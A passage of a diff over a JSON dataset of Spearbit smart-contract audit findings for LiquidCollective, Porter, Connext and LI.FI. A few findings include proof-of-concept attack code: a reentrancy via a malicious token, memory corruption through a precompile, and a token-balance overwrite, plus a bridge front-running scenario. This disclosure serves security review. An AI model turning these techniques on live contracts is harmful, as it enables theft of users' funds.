"https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The min function returns the minimum of the 2 inputs, but the return name used is max.", + "title": "Move code to check amount of tokens transferred to library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Facet.sol,OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. The following piece of code is present However it doesnt check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Discrepancy between architecture and code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The architecture diagram states that admin triggers deposits on the Consensus Layer Deposit Man- ager, but the depositToConsensusLayer() function allows anyone to trigger such deposits.", + "title": "Fuse pools are not whitelisted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of pool is not checked. Be- cause of Fuse is permissionless framework, an attacker can create a fake pool, through this contract a user can be be tricked in the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {}", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Consider replacing the remaining require with custom errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In the vast majority of the project contracts have defined and already use Custom Errors that provide a better UX, DX and gas saving compared to require statements. There are still some instances of require usage in ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors.", + "title": "Missing two-step transfer ownership pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Executor contract used for arbitrary cross-chain and same chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin which is a simple mechanism to transfer the ownership not supporting a two-steps transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation and transferring it to an inaccessible wallet or renouncing the owner- ship e.g. by mistake, can effectively lost functionality.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Both wlsETH and lsETH transferFrom implementation allow the owner of the token to use trans- ferFrom like if it was a \"normal\" transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of transferFrom allow the msg.sender to use the function like if it was a \"normal\" transfer. In this case, the allowance is checked only if the msg.sender is not equal to _from if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverge from what is usually implemented in both Solmate and OpenZeppelin.", + "title": "Use low-level call only on contract addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user intention here will be to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. Otherwise, users can be under a wrong assumption that their cross-chain call was successful.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Both wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of the function transferFrom in both SharesManager.1.sol and WLSETH.1.sol is not taking into consideration the scenario where a user has approved a spender the maximum possible allowance type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the one from Solmate and OpenZeppelin. In their implementation, they check and reduce the spender allowance if and only if the allowance is different from type(uint256).max.", + "title": "Functions which do not expect ether should be non-payable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "A function which doesnt expect ether should not be marked payable. swapAndStartBridgeTo- kensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the con- tract.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Missing, confusing or wrong natspec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In the current implementation not all the constructors, functions, events, custom errors, variables or struct are covered by natspec comments. Some of them are only partially covered (missing @param, @return and so on). Note that the contracts listed in the context section of the issue have inside of them complete or partial missing natspec. Natspec Fixes / Typos: River.1.sol#L38-L39 Swap the empty line with the NatSpec @notice - /// @notice Prevents unauthorized calls - + + /// @notice Prevents unauthorized calls OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114 Replace name with index. - /// @param _index The name identifying the operator + /// @param _index The index identifying the operator OperatorsRegistry.1.sol#L218 Replace cound with count. - /// @notice Changes the operator stopped validator cound + /// @notice Changes the operator stopped validator count Expand the natspec explanation: We also suggest expanding some function's logic inside the natspec OperatorsRegistry.1.sol#L355-L358 Expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the number of total operator and not the active/fundable one. ReportsVariants.sol#L5 Add a comment that explains the COUNT_OUTMASK's assignment. This will mask beaconValidators and beacon- Balance in the designed packing. xx...xx xxxx & COUNT_OUTMASK == 00...00 0000 ReportsVariants.sol ReportsVariants should have a documentation regarding the packing used for ReportsVariants in an uint256: [ 0, 16) : oracle member's total vote count for the numbers below (uint16, 2 bytes) ,! [16, [48, 112) : 48) : total number of beacon validators (uint32, 4 bytes) total balance of all the beacon validators (uint64, 6 bytes) OracleMembers.sol Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol 63 Leave a comment/warning for the ReportsPosition setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205 Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49 Leave a comment, warning that the permission bitmaps will be overwritten instead of them getting updated. OracleManager.1.sol#L44 Add more comment for _roundId to mention that when the setBeaconData is called by Oracle.1.sol:_push- ToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310 _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC) 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62 Better rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289 Update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further con- fusion. Client answer to the PR comment The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count than with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validator we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count.", + "title": "Incompatible contract used in the WormholeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been observed that all other faucets are using SwapperV2 contract. However, the WormholeFacet is still using Swapper contract. With the recent change on the SwapperV2, leftOvers can be send to specific receiver. With the using old contract, this capability will be lost in the related faucet. Also, LiFi Team claims that Swapper contract will be deprecated. ... import { Swapper } from \"../Helpers/Swapper.sol\"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports from code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The codebase has unused imports across the code base. If they are not used inside the contract, it would be better to remove them to avoid confusion.", + "title": "Solidity version bump to latest", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the review the newest version of solidity was released with the important bug fixes & Bug.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Missing event emission in critical functions, init functions and setters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Some critical functions like contract's constructor, contract's init*(...)function (upgradable con- tracts) and some setter or in general critical functions are missing event emission. Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider if adding a general broad event like ContractInitial- ized or split it in more specific events like QuorumUpdated+OwnerChanged+... 65 Note: in general, consider adding an event emission to all the init*(...) functions used to initialize the upgrad- able contracts, passing to the event the relevant args in addition to the version of the upgrade.", + "title": "Bridge with AmarokFacet can fail due to hardcoded variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that Its set to 0 on the testnet. On the mainnet, these variables can be edited by Connext and AmarokFacet bridge operations can fail. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Freeze Redeems if bonds too Large", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overow in previewRedeemAtMaturity. If a users bonds andpaidAmounts (or bonds * nonPaidAmount) product is greater than 2**256, it will overow, reverting all attempts to redeem bonds.", + "title": "Store _dexs[i] into a temp variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The DexManagerFacet can store _dexs[i] into a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } } 43", "labels": [ "Spearbit", - "Porter", - "Severity: Medium Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modier, limiting their access to the owner of the contract. function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner function withdrawExcessPayment(address receiver) external onlyOwner When transferring tokens, execution ow is handed over to the token contract. Therefore, if a malicious token manages to call the owners address it can also call these functions again to withdraw more tokens than required. As an example consider the following case where the collateral tokens transferFrom() function calls the owners address: 4 function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { if (reenter) { reenter = false; owner.attack(bond, amount); } address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } and the owner contract has a function: function attack(address _bond, uint256 _amount) external { IBond(_bond).withdrawExcessCollateral(_amount, address(this)); } When withdrawExcessCollateral() is called by owner, it allows it to withdraw double the amount via reentrancy.", + "title": "Optimize array length in for loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In a for loop the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... }", "labels": [ "Spearbit", - "Porter", - "Severity: Medium Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "burn() and burnFrom() allow users to lose their bonds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The Bond contract inherits from ERC20BurnableUpgradeable. contract Bond is IBond, OwnableUpgradeable, ERC20BurnableUpgradeable, This exposes the burn() and burnFrom() functions to users who could get their bonds burned due to an error or a front-end attack.", + "title": "StargateFacet can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "It might be cheaper to call getTokenFromPoolId in a constructor and store in immutable variables (especially because there are not that many pool, currently max 3 per chain pool-ids ) On the other hand, It requires an update of the facet when new pools are added though. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and lookup the poolid. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId e.g. the same asset is received on the destination chain. This seems a logical restriction. The advantage of not having to specify the poolids is that you abstract the interface from the caller and make the function calls more similar.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Missing two-step transfer ownership pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "After a bond is created its ownership is transferred to the wallet which invoked the createBond function, but it can be later transferred to anyone at any time or the renounceOwnership function can be called. The Bond contract uses the Ownable Openzeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever.", + "title": "Use block.chainid for chain ID verification in HopFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "HopFacet.sol uses user provided _hopData.fromChainId to identify current chain ID. Call to Hop Bridge will revert if it does not match block.chain, so this is still secure. However, as a gas optimization, this parameter can be removed from HopData struct, and its usage can be replaced by block.chainid.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Inefcient initialization of minimal proxy implementation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the reporting the issue it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact signicantly. deploy_bond_factory.ts#L24 6 const implementationContract = (await ethers.getContractAt( \"Bond\", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( \"Placeholder Bond\", \"BOND\", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, \"0x0000000000000000000000000000000000000000\", \"0x0000000000000000000000000000000000000001\", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log(\"Is the contract already initialized?\"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch) and because in case of a successful exploitation the impact on the system remains minimal, this nding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization.", + "title": "Rename event InvalidAmount(uint256) to ZeroAmount()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "event InvalidAmount(uint256) is emitted only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever emitted.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Verify amount is greater than 0 to avoid unnecessarily safeTransfer() calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0.", + "title": "Use custom errors instead of strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", "labels": [ "Spearbit", - "Porter", - "Severity: Gas Optimization" + "LIFI", + "Severity: Gas Optimization LibDiamond.sol#L56," ] }, { - "title": "Improve checks for token allow-list", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The BondFactory contract has two enabled allow-lists by default, which require the teams approval for issuers and tokens to create bonds. However, the screening process was not properly dened before the assessment. In case a malicious token and issuer slip through the screening process the protocol can be used by malicious actors to perform mass scam attacks. In such scenario, tokens and issuers would be able to create bonds, sell those anywhere and later on exploit those tokens, leading to loss of user funds. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone)", + "title": "Use calldata over memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * .length). Using calldata directly, obliviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, its still more gass-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Some gas savings if function arguments are passed as calldata instead of memory.", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect revert message", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountPaid() > 0, which means the bonds is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); }", + "title": "Avoid reading from storage when possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Functions, which can only be called by the contracts owner, can use msg.sender to read owners In all these cases below, ownership check is already done, so it is address after the ownership check is done. guaranteed that owner == msg.sender. LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead.", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Non-existent bonds naming/symbol restrictions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The issuer can dene any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: Mislead users into thinking they are buying bonds consisting of different tokens. Use abusive names to discredit the team. Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this nding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation.", + "title": "Increment for loop variable in an unchecked block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "(This is only relevant if you are using the default solidity checked arithmetic). i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Needles variable initialization for default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "uint256 variable are initialized to a default value of zero per Solidity docs. Setting a variable to the default value is unnecessary.", + "title": "Executor should consider pre-deployed contract behaviors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different evm compatible chain would have different security assumption. Please refer to the Avax bug fix. Native-asset-call-deprecation Were the native asset call not deprecated, exploiters can bypass the check and triggers ERC20Proxy through the pre-deployed contract. Since the Avalanche team has deprecated the dangerous pre-deployed, the current Executor contract is not vulnerable. Moonbeams pre-deployed contract also has strange behaviors. Precompiles erc20 allows users transfer native token through ERC20 interface. Users can steal native tokens on the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount) One of the standard ethereum mainnet precompiles is \"Identity\" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC: 47 pragma solidity ^0.8.17; import \"hardhat/console.sol\"; contract Identity { function CorruptMem() public { uint dest = 128; uint data = dest + 1 ; uint len = 4; assembly { if iszero(call(gas(), 0x04, 0, add(data, 0x20), len, add(dest,0x20), len)) { invalid() } } } constructor() { string memory a = \"Test!\"; CorruptMem(); console.log(string(a)); // --> est!! } }", "labels": [ "Spearbit", - "Porter", + "LIFI", "Severity: Informational" ] }, { - "title": "Deationary payment tokens are not handled in the pay() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", + "title": "Documentation improvements", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are a few issues in the documentation: HyphenFacets documentation describes a function no longer present. Link to DexManagerFacet in README.md is incorrect.", "labels": [ "Spearbit", - "Porter", + "LIFI", "Severity: Informational" ] }, { - "title": "Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier checks that the call originates from another BridgeRouter (assuming a correct configuration of the whitelist) to the onReceive() function, it does not check that the call originates from another Connext Diamond. Therefore, allowing anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connexts NomadFacet.sol contract. This can be abused by a front-running attack as described in the following scenario: Alice is a bridge user and makes an honest call to transfer funds over to the destination chain. Bob does not make a transfer but instead calls the sendToHook() function with the same _extraData but passes an _amount of 1 wei. Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify incoming TransferToHook messages. Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId. However, because _amount is not verified against the transferId, Alice receives significantly less tokens and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them. function onReceive( uint32, // _origin, not used uint32, // _tokenDomain, not used bytes32, // _tokenAddress, of canonical token, not used address _localToken, uint256 _amount, bytes memory _extraData ) external onlyBridgeRouter { bytes32 transferId = bytes32(_extraData); // Ensure the transaction has not already been handled (i.e. previously reconciled). if (s.reconciledTransfers[transferId]) { revert NomadFacet__reconcile_alreadyReconciled(); } // Mark the transfer as reconciled. s.reconciledTransfers[transferId] = true; Note: the same issues exists with _localToken. As a result a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook().", + "title": "Check quoteTimestamp is within ten minutes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "quoteTimestamp is not validated. According to Across, quoteTimestamp variable, at which the depositor will be quoted for L1 liquidity. This enables the depositor to know the L1 fees before submitting their deposit. Must be within 10 mins of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, ,! _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "swapOut allows overwrite of token balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The StableSwapFacet has the function swapExactOut() where a user could supply the same as- setIn address as assetOut, which means the TokenIndexes for tokenIndexFrom and tokenIndexTo function swapOut() are the same. In function swapOut() a temporay array is used to store balances. When updating such balances, first self.balances[tokenIndexFrom] is updated and then self.balances[tokenIndexTo] is updated afterwards. However when tokenIndexFrom == tokenIndexTo the second update overwrites the first update, causing token balances to be arbitrarily lowered. This also skews the exchange rates, allowing for swaps where value can be extracted. Note: the protection against this problem is location in function getY(). However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForEx- actOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes. There- fore, there isnt an immediate risk here. 7 contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if ,! From==To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, \"compare token to itself\"); // here is the protection ... } } Below is a proof of concept which shows that the balances of index 3 can be arbitrarily reduced. //SPDX-License-Identifier: MIT pragma solidity 0.8.14; import \"hardhat/console.sol\"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom,uint8 tokenIndexTo,uint dx) public { uint dy=dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3,3,10); console.log(balances[3]); // 90 } }", + "title": "Integrate two versions of depositAsset()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The 